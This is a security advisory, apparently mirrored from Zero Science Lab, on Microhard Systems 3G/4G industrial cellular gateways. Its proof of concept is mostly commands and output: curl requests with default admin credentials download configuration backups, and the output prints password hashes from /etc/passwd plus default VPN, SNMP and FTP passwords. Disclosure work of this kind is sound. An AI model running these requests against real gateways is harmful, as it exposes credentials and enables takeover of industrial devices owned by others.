扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 |
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Configuration Download Vendor: Microhard Systems Inc. Product web page: http://www.microhardcorp.com Affected version: IPn4G 1.1.0 build 1098 IPn3Gb 2.2.0 build 2160 IPn4Gb 1.1.6 build 1184-14 IPn4Gb 1.1.0 Rev 2 build 1090-2 IPn4Gb 1.1.0 Rev 2 build 1086 Bullet-3G 1.2.0 Rev A build 1032 VIP4Gb 1.1.6 build 1204 VIP4G 1.1.6 Rev 3.0 build 1184-14 VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196 IPn3Gii / Bullet-3G 1.2.0 build 1076 IPn4Gii / Bullet-LTE 1.2.0 build 1078 BulletPlus 1.3.0 build 1036 Dragon-LTE 1.1.0 build 1036 Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial RS232/485/422 devices! The IPn3Gb provides a fast, secure industrial strength wireless solution that uses the widespread deployment of cellular network infrastructure for critical data collection. From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers! The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It provides robust and secure wireless communication of Serial, USB and Ethernet data. The all new Bullet-3G provides a compact, robust, feature packed industrial strength wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things to the next level by providing features such as Ethernet with PoE, RS232 Serial port and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution worth looking at! The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight system integration and design flexibility with dual Ethernet Ports and high power 802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access Control Lists, the Dragon-LTE provides a solution for any cellular application! The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE network infrastructure for critical data communications. The VIP4Gb provides simultaneous network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network. It provides robust and secure wireless communication of Serial, Ethernet & WiFi data. Desc: The system backup configuration file 'IPn4G.config' in '/' directory or its respective name based on the model name including the similar files in '/www/cgi-bin/system.conf', '/tmp' and the cli.conf in '/etc/m_cli/' can be downloaded by an authenticated attacker in certain circumstances. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and/or full system access. Tested on: httpd-ssl-1.0.0 Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2018-5484 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5484.php 13.03.2018 -- /etc/m_cli/cli.conf: -------------------- curl "http://192.168.1.1/cgi-bin/webif/download.sh?script=/cgi-bin/webif/system-editor.sh&path=/etc/m_cli&savefile=cli.conf" -H "Authorization: Basic YWRtaW46YWRtaW4=" |grep passwd % Total% Received % XferdAverage Speed TimeTime TimeCurrent DloadUpload Total SpentLeftSpeed 100271910027190 0 257400:00:010:00:01 --:--:--2577 passwd admin /www/IPn4G.config: ------------------ lqwrm@metalgear:~$ curl http://192.168.1.1/IPn4G.config -o IPn4G.tar.gz -H "Authorization: Basic YWRtaW46YWRtaW4=" % Total% Received % XferdAverage Speed TimeTime TimeCurrent DloadUpload Total SpentLeftSpeed 100 13156100 131560 0 951000:00:010:00:01 --:--:--9512 lqwrm@metalgear:~$ tar -zxf IPn4G.tar.gz ; ls config.boardinfoconfig.boardtypeconfig.dateconfig.nameetcIPn4G.tar.gzusr lqwrm@metalgear:~$ cat config.boardinfo config.boardtype config.date config.name 2012 Microhard Systems Inc.:IPn4Gb-IPn4G:v1.0.0 Atheros AR7130 rev 2 Thu Jul 12 12:42:42 PDT 2018 IPn4G lqwrm@metalgear:~$ cat usr/lib/hardware_desc modem_type="N930" LTE_ATCOMMAND_PORT="/dev/ttyACM0" LTE_DIAG_PORT="" LTE_GPS_PORT="" wificard = "0" lqwrm@metalgear:~$ ls etc/ configcrontabsdropbearethersfirewall.userhostshttpd.confpasswdssl lqwrm@metalgear:~$ ls etc/config/ comport dhcpgpsgatetr iperf modbusd notessdpServer twatchdogwebif_access_control comport2dropbeargpsripsec msmscomdntpclientsnmpd updatedd websockserver coova-chilliethernetgpsrecorderdkeepalive msshc ntrd snmpd.confvlan wireless croneurdgre-tunnels localmonitornetwork pimd systemvnstat wsclient crontabsfirewallhttpd lte network_IPnVTn3Gping timezonevpnc datausemonitorgpsdioports lte362network_VIP4G salertdtmpstatus webif lqwrm@metalgear:~$ cat etc/passwd root:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash admin:$1$0VKXa1iD$.Jw20V3iH3kx6VSLjsFZP.:0:0:admin:/:/etc/m_cli/m_cli.sh upgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false at:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI nobody:*:65534:65534:nobody:/var:/bin/false testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh testingus:$1$S9c8yiFq$P96OckXNQMhpKjFoRx1sL.:1000:1000:Linux User,,,:/home/testingus:/bin/false msshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh /www/cgi-bin/system.conf: ------------------------- lqwrm@metalgear:~$ curl -O http://192.168.1.1/cgi-bin/system.conf -H "Authorization: Basic YWRtaW46YWRtaW4=" lqwrm@metalgear:~$ cat system.conf |grep -irnH "password" -A2 system.conf:236:#VPN Admin Password: system.conf-237-NetWork_IP_VPN_Passwd=admin system.conf-238- -- system.conf:309:#V3 Authentication Password: system.conf:310:NetWork_SNMP_V3_Auth_Password=00000000 system.conf-311- system.conf:312:#V3 Privacy Password: system.conf:313:NetWork_SNMP_V3_Privacy_Password=00000000 Login to FTP (upgrade:admin). In /tmp/ or /tmp/upgrade/ the system.conf (gzipped) is located. --------------------------------------------------------------------------------------------- |
体验盒子
